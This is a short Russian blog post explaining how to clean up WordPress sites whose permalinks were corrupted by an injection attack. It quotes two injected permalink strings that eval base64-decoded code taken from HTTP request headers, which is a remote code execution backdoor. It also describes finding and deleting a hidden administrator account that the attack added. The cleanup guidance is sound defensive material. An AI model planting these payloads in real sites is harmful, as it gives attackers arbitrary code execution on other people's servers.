Как оказалось, на днях многие блоги на WordPress были подвергнуты MySQL-инъекции, которая портит постоянные ссылки (пермалинки), превращая их, таким образом, в нерабочие. Это короткая статья о том, как исправить эту ситуацию.

Атакованные блоги подвергаются хаку, который добавляет к пермалинку

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

или

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

После этого пермалинк, конечно, перестает работать и получить доступ к посту можно, только если удалить этот добавленный код.

Лечение:

1. Перейти в админке к Setting->Permalinks и удалить вышеуказанный код.
2. Перейти к пользователям, там обнаружится больше пользователей с административными правами, чем обычно.
3. Провести мышкой над каждым, чтобы вычислить последнего зарегистрировавшегося.
4. У этого пользователя правым кликом скопировать ссылку Редактирование/Edit и вставить его в адресную строку, увеличить номер на 1.
5. Вы должны получить скрытого админа со странным кодом в поле Имя. Удалите код, чтобы понизить его статус до Подписчика, затем снова перейдите к Пользователям и удалите его.

На этом все. Не забывайте вовремя обновляться до последних версий.